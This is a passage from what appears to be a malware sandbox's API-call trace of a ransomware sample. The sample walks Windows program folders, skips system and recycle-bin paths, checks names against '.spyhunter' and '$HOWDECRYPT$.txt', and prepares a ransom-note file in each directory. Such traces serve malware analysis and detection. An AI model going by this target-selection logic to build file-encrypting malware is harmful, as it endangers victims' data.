lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.480] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.480] lstrlenW (lpString="Windows") returned 7 [0086.481] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.481] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.481] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.481] lstrlenW (lpString="System Volume Information") returned 25 [0086.481] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\.") returned 62 [0086.481] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.481] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.481] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.481] lstrlenW (lpString="Windows") returned 7 [0086.481] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.481] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.481] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.481] lstrlenW (lpString="System Volume Information") returned 25 [0086.481] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\..") returned 63 [0086.481] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.481] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.481] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.481] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.481] lstrlenW (lpString="Windows") returned 7 [0086.481] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.481] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.481] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.481] lstrlenW (lpString="System Volume Information") returned 25 [0086.481] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui") returned 76 [0086.481] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.481] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.481] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.481] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\tipresx.dll.mui") returned 76 [0086.481] GetProcessHeap () returned 0x2c0000 [0086.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372958 [0086.482] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x888) returned 0x3867e8 [0086.482] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.482] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.482] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\$HOWDECRYPT$.txt") returned 77 [0086.482] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\$HOWDECRYPT$.txt") returned 77 [0086.482] GetProcessHeap () returned 0x2c0000 [0086.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372a40 [0086.482] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x890) returned 0x3867e8 [0086.482] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.482] lstrcmpiW (lpString1="fsdefinitions", lpString2="Windows") returned -1 [0086.482] lstrlenW (lpString="Windows") returned 7 [0086.482] lstrcmpiW (lpString1="fsdefinitions", lpString2="$Recycle.bin") returned 1 [0086.482] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.482] lstrcmpiW (lpString1="fsdefinitions", lpString2="System Volume Information") returned -1 [0086.482] lstrlenW (lpString="System Volume Information") returned 25 [0086.482] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 68 [0086.482] lstrcmpW (lpString1="fsdefinitions", lpString2=".") returned 1 [0086.482] lstrcmpW (lpString1="fsdefinitions", lpString2="..") returned 1 [0086.482] GetProcessHeap () returned 0x2c0000 [0086.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.482] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*") returned 70 [0086.482] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.491] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.491] lstrlenW (lpString="Windows") returned 7 [0086.491] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.491] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.491] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.492] lstrlenW (lpString="System Volume Information") returned 25 [0086.492] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\.") returned 70 [0086.492] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.492] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.492] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.492] lstrlenW (lpString="Windows") returned 7 [0086.492] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.492] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.492] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.492] lstrlenW (lpString="System Volume Information") returned 25 [0086.492] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\..") returned 71 [0086.492] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.492] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.492] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.492] lstrcmpiW (lpString1="auxpad", lpString2="Windows") returned -1 [0086.492] lstrlenW (lpString="Windows") returned 7 [0086.492] lstrcmpiW (lpString1="auxpad", lpString2="$Recycle.bin") returned 1 [0086.492] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.492] lstrcmpiW (lpString1="auxpad", lpString2="System Volume Information") returned -1 [0086.492] lstrlenW (lpString="System Volume Information") returned 25 [0086.492] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned 75 [0086.492] lstrcmpW (lpString1="auxpad", lpString2=".") returned 1 [0086.492] lstrcmpW (lpString1="auxpad", lpString2="..") returned 1 [0086.492] GetProcessHeap () returned 0x2c0000 [0086.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373808 [0086.493] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*") returned 77 [0086.493] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0086.510] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.510] lstrlenW (lpString="Windows") returned 7 [0086.511] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.511] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.511] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.511] lstrlenW (lpString="System Volume Information") returned 25 [0086.511] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\.") returned 77 [0086.511] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.511] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.511] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.511] lstrlenW (lpString="Windows") returned 7 [0086.511] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.511] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.511] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.511] lstrlenW (lpString="System Volume Information") returned 25 [0086.511] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\..") returned 78 [0086.511] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.511] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.511] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.511] lstrcmpiW (lpString1="auxbase.xml", lpString2="Windows") returned -1 [0086.511] lstrlenW (lpString="Windows") returned 7 [0086.511] lstrcmpiW (lpString1="auxbase.xml", lpString2="$Recycle.bin") returned 1 [0086.511] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.511] lstrcmpiW (lpString1="auxbase.xml", lpString2="System Volume Information") returned -1 [0086.511] lstrlenW (lpString="System Volume Information") returned 25 [0086.512] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 87 [0086.512] StrStrIW (lpFirst="auxbase.xml", lpSrch=".spyhunter") returned 0x0 [0086.512] lstrcmpW (lpString1="auxbase.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.512] lstrcmpW (lpString1="auxbase.xml", lpString2="_uninstalling_.png") returned 1 [0086.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml") returned 87 [0086.512] GetProcessHeap () returned 0x2c0000 [0086.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x3716c8 [0086.512] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x868) returned 0x3867e8 [0086.512] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0086.512] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0086.512] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\$HOWDECRYPT$.txt") returned 92 [0086.512] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\$HOWDECRYPT$.txt") returned 92 [0086.512] GetProcessHeap () returned 0x2c0000 [0086.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x370998 [0086.512] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x870) returned 0x3867e8 [0086.513] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.513] lstrcmpiW (lpString1="auxpad.xml", lpString2="Windows") returned -1 [0086.513] lstrlenW (lpString="Windows") returned 7 [0086.513] lstrcmpiW (lpString1="auxpad.xml", lpString2="$Recycle.bin") returned 1 [0086.513] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.513] lstrcmpiW (lpString1="auxpad.xml", lpString2="System Volume Information") returned -1 [0086.513] lstrlenW (lpString="System Volume Information") returned 25 [0086.513] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 79 [0086.513] StrStrIW (lpFirst="auxpad.xml", lpSrch=".spyhunter") returned 0x0 [0086.513] lstrcmpW (lpString1="auxpad.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.513] lstrcmpW (lpString1="auxpad.xml", lpString2="_uninstalling_.png") returned 1 [0086.513] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 79 [0086.513] GetProcessHeap () returned 0x2c0000 [0086.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x372788 [0086.513] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x878) returned 0x3867e8 [0086.514] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.514] lstrcmpiW (lpString1="keypad", lpString2="Windows") returned -1 [0086.514] lstrlenW (lpString="Windows") returned 7 [0086.514] lstrcmpiW (lpString1="keypad", lpString2="$Recycle.bin") returned 1 [0086.514] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.514] lstrcmpiW (lpString1="keypad", lpString2="System Volume Information") returned -1 [0086.514] lstrlenW (lpString="System Volume Information") returned 25 [0086.514] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned 75 [0086.514] lstrcmpW (lpString1="keypad", lpString2=".") returned 1 [0086.514] lstrcmpW (lpString1="keypad", lpString2="..") returned 1 [0086.514] GetProcessHeap () returned 0x2c0000 [0086.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373808 [0086.514] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*") returned 77 [0086.514] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0086.514] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.514] lstrlenW (lpString="Windows") returned 7 [0086.514] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.515] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.515] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.515] lstrlenW (lpString="System Volume Information") returned 25 [0086.515] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\.") returned 77 [0086.515] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.515] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.515] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.515] lstrlenW (lpString="Windows") returned 7 [0086.515] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.515] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.515] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.515] lstrlenW (lpString="System Volume Information") returned 25 [0086.516] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\..") returned 78 [0086.516] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.516] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.516] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.516] lstrcmpiW (lpString1="ea.xml", lpString2="Windows") returned -1 [0086.516] lstrlenW (lpString="Windows") returned 7 [0086.516] lstrcmpiW (lpString1="ea.xml", lpString2="$Recycle.bin") returned 1 [0086.516] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.516] lstrcmpiW (lpString1="ea.xml", lpString2="System Volume Information") returned -1 [0086.516] lstrlenW (lpString="System Volume Information") returned 25 [0086.516] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 82 [0086.516] StrStrIW (lpFirst="ea.xml", lpSrch=".spyhunter") returned 0x0 [0086.516] lstrcmpW (lpString1="ea.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.516] lstrcmpW (lpString1="ea.xml", lpString2="_uninstalling_.png") returned 1 [0086.516] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 82 [0086.516] GetProcessHeap () returned 0x2c0000 [0086.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x328af8 [0086.516] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x880) returned 0x3867e8 [0086.516] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.516] lstrcmpiW (lpString1="keypadbase.xml", lpString2="Windows") returned -1 [0086.516] lstrlenW (lpString="Windows") returned 7 [0086.516] lstrcmpiW (lpString1="keypadbase.xml", lpString2="$Recycle.bin") returned 1 [0086.516] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.516] lstrcmpiW (lpString1="keypadbase.xml", lpString2="System Volume Information") returned -1 [0086.516] lstrlenW (lpString="System Volume Information") returned 25 [0086.516] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 90 [0086.516] StrStrIW (lpFirst="keypadbase.xml", lpSrch=".spyhunter") returned 0x0 [0086.516] lstrcmpW (lpString1="keypadbase.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.516] lstrcmpW (lpString1="keypadbase.xml", lpString2="_uninstalling_.png") returned 1 [0086.516] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 90 [0086.516] GetProcessHeap () returned 0x2c0000 [0086.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf6) returned 0x370aa0 [0086.516] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x888) returned 0x3867e8 [0086.516] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.516] lstrcmpiW (lpString1="kor-kor.xml", lpString2="Windows") returned -1 [0086.516] lstrlenW (lpString="Windows") returned 7 [0086.517] lstrcmpiW (lpString1="kor-kor.xml", lpString2="$Recycle.bin") returned 1 [0086.517] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.517] lstrcmpiW (lpString1="kor-kor.xml", lpString2="System Volume Information") returned -1 [0086.517] lstrlenW (lpString="System Volume Information") returned 25 [0086.517] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 87 [0086.517] StrStrIW (lpFirst="kor-kor.xml", lpSrch=".spyhunter") returned 0x0 [0086.517] lstrcmpW (lpString1="kor-kor.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.517] lstrcmpW (lpString1="kor-kor.xml", lpString2="_uninstalling_.png") returned 1 [0086.517] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 87 [0086.517] GetProcessHeap () returned 0x2c0000 [0086.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf0) returned 0x370ba0 [0086.517] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x890) returned 0x3867e8 [0086.517] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0086.517] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0086.517] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\$HOWDECRYPT$.txt") returned 92 [0086.517] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\$HOWDECRYPT$.txt") returned 92 [0086.517] GetProcessHeap () returned 0x2c0000 [0086.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x370c98 [0086.517] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x898) returned 0x3867e8 [0086.518] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.518] lstrcmpiW (lpString1="keypad.xml", lpString2="Windows") returned -1 [0086.518] lstrlenW (lpString="Windows") returned 7 [0086.518] lstrcmpiW (lpString1="keypad.xml", lpString2="$Recycle.bin") returned 1 [0086.518] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.518] lstrcmpiW (lpString1="keypad.xml", lpString2="System Volume Information") returned -1 [0086.518] lstrlenW (lpString="System Volume Information") returned 25 [0086.518] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 79 [0086.518] StrStrIW (lpFirst="keypad.xml", lpSrch=".spyhunter") returned 0x0 [0086.518] lstrcmpW (lpString1="keypad.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.518] lstrcmpW (lpString1="keypad.xml", lpString2="_uninstalling_.png") returned 1 [0086.518] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 79 [0086.518] GetProcessHeap () returned 0x2c0000 [0086.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x372870 [0086.518] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x8a0) returned 0x3867e8 [0086.518] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.518] lstrcmpiW (lpString1="main", lpString2="Windows") returned -1 [0086.518] lstrlenW (lpString="Windows") returned 7 [0086.518] lstrcmpiW (lpString1="main", lpString2="$Recycle.bin") returned 1 [0086.518] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.518] lstrcmpiW (lpString1="main", lpString2="System Volume Information") returned -1 [0086.518] lstrlenW (lpString="System Volume Information") returned 25 [0086.518] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 73 [0086.518] lstrcmpW (lpString1="main", lpString2=".") returned 1 [0086.519] lstrcmpW (lpString1="main", lpString2="..") returned 1 [0086.519] GetProcessHeap () returned 0x2c0000 [0086.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373808 [0086.519] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*") returned 75 [0086.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0086.848] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.848] lstrlenW (lpString="Windows") returned 7 [0086.848] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.848] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.848] lstrlenW (lpString="System Volume Information") returned 25 [0086.848] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\.") returned 75 [0086.848] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.848] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.848] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.848] lstrlenW (lpString="Windows") returned 7 [0086.848] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.848] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.848] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.848] lstrlenW (lpString="System Volume Information") returned 25 [0086.848] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\..") returned 76 [0086.848] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.849] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.849] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.849] lstrcmpiW (lpString1="base.xml", lpString2="Windows") returned -1 [0086.849] lstrlenW (lpString="Windows") returned 7 [0086.849] lstrcmpiW (lpString1="base.xml", lpString2="$Recycle.bin") returned 1 [0086.849] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.849] lstrcmpiW (lpString1="base.xml", lpString2="System Volume Information") returned -1 [0086.849] lstrlenW (lpString="System Volume Information") returned 25 [0086.849] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 82 [0086.849] StrStrIW (lpFirst="base.xml", lpSrch=".spyhunter") returned 0x0 [0086.849] lstrcmpW (lpString1="base.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.849] lstrcmpW (lpString1="base.xml", lpString2="_uninstalling_.png") returned 1 [0086.849] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 82 [0086.849] GetProcessHeap () returned 0x2c0000 [0086.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x328be8 [0086.849] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x880) returned 0x3867e8 [0086.849] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.849] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="Windows") returned -1 [0086.849] lstrlenW (lpString="Windows") returned 7 [0086.849] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="$Recycle.bin") returned 1 [0086.849] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.849] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="System Volume Information") returned -1 